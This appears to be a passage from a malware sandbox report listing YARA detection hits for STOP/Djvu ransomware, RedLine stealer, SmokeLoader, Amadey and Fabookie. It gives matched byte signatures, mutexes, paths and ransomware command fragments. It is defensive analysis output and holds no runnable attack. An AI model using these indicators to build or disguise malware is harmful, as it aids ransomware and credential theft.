0000002C.00000002.693972740.00000000041B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001A.00000003.702112797.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000016.00000002.671418165.0000000003FBC000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000009.00000002.640494053.0000000004023000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000D.00000002.664431605.000000000400F000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000011.00000003.658454549.00000000025D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000003.714108073.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
00000011.00000002.859320186.0000000004131000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000003.708507923.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
00000000.00000002.572170619.00000000024CA000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x5c3e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.636285582.0000000002460000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001A.00000003.721198751.0000000000E59000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
0000001A.00000003.790895899.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000011.00000002.877619417.0000000004320000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.877619417.0000000004320000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x264fe:$pat14: , CommandLine: 0x1e509:$v2_1: ListOfProcesses 0x1ca03:$v4_3: base64str 0x1c9c2:$v4_4: stringKey 0x1ca0d:$v4_5: BytesToStringConverted 0x1c9f8:$v4_6: FromBase64 0x1e2bf:$v4_8: procName
00000014.00000002.669374057.00000000041A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000014.00000002.669374057.00000000041A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001D.00000000.674614244.00000000009B1000.00000020.00000001.01000000.00000018.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000004.00000002.636523858.00000000025F8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x5df6:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001D.00000002.802176864.0000000001526000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000004.00000002.637979878.0000000003F81000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.637979878.0000000003F81000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000003.725519264.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
0000001A.00000003.760176887.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
00000004.00000002.636377602.00000000025C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.636377602.00000000025C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x7d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000011.00000002.878802672.000000000460B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.668986943.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001A.00000003.734810552.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
00000009.00000002.640576372.00000000040F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000009.00000002.640576372.00000000040F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000025.00000002.680104542.00000000009B1000.00000020.00000001.01000000.00000018.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000002.678831039.0000000003E10000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001A.00000003.778651264.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
00000015.00000002.678506233.0000000002549000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x5829:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000E.00000002.696312299.0000000003FD7000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001A.00000003.732320393.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
0000001D.00000002.801672555.00000000009B1000.00000020.00000001.01000000.00000018.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000007.00000002.636451401.0000000004140000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000007.00000002.636451401.0000000004140000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001A.00000003.692248111.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
00000015.00000002.679075530.0000000003E81000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000015.00000002.679075530.0000000003E81000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001A.00000003.706466156.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
00000011.00000002.801800101.0000000000400000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.801800101.0000000000400000.00000040.00000001.01000000.0000000F.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 12 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000D.00000002.666710830.0000000004120000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000D.00000002.666710830.0000000004120000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001A.00000003.733256278.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
0000001A.00000003.718588900.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001A.00000003.774340866.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
0000001A.00000003.704153746.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
00000015.00000003.662382966.0000000003E20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001B.00000002.675341132.0000000000961000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000002.672588515.0000000004050000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000016.00000002.672588515.0000000004050000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000003.702521442.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
0000001A.00000003.742156938.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
0000001A.00000003.783994033.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
0000001A.00000003.793329329.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
0000002C.00000002.693772578.0000000004028000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000007.00000002.635919053.0000000003FD8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.633865910.0000000003FE9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000E.00000002.697156815.0000000004180000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000E.00000002.697156815.0000000004180000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000017.00000002.687087896.0000000004165000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: E640.exe PID: 7032	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E640.exe PID: 7032	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3105c:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: E640.exe PID: 7100	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E640.exe PID: 7100	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3c6fd:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 617B.exe PID: 7136	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 617B.exe PID: 7136	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x381ab:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 617B.exe PID: 3192	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 617B.exe PID: 3192	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3a720:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 5274.exe PID: 6708	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 5274.exe PID: 6708	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x47c13:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 5274.exe PID: 6700	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 5274.exe PID: 6700	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3f350:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: C474.exe PID: 6756	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: C474.exe PID: 6756	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4b03c:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 5274.exe PID: 2148	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 5274.exe PID: 2148	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4c4b3:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 325D.exe PID: 6864	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 325D.exe PID: 6864	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: C474.exe PID: 476	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: C474.exe PID: 476	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x452eb:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 5274.exe PID: 5080	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 5274.exe PID: 5080	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x32bfa:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 5274.exe PID: 7048	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 5274.exe PID: 7048	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x48819:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 5274.exe PID: 2788	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 5274.exe PID: 2788	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x32ac9:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 5274.exe PID: 6836	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 5274.exe PID: 6836	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4ea82:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: aafg31.exe PID: 5060	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
Process Memory Space: oneetx.exe PID: 5148	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
Process Memory Space: 5274.exe PID: 5428	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 5274.exe PID: 5428	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x42800:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 5274.exe PID: 5780	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 5274.exe PID: 5780	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3105c:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Click to see the 136 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
17.2.325D.exe.4320ee8.5.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.325D.exe.4320ee8.5.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x23816:$pat14: , CommandLine: 0x1b821:$v2_1: ListOfProcesses 0x19d1b:$v4_3: base64str 0x19cda:$v4_4: stringKey 0x19d25:$v4_5: BytesToStringConverted 0x19d10:$v4_6: FromBase64 0x1b5d7:$v4_8: procName
23.2.FE5F.exe.420fd90.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
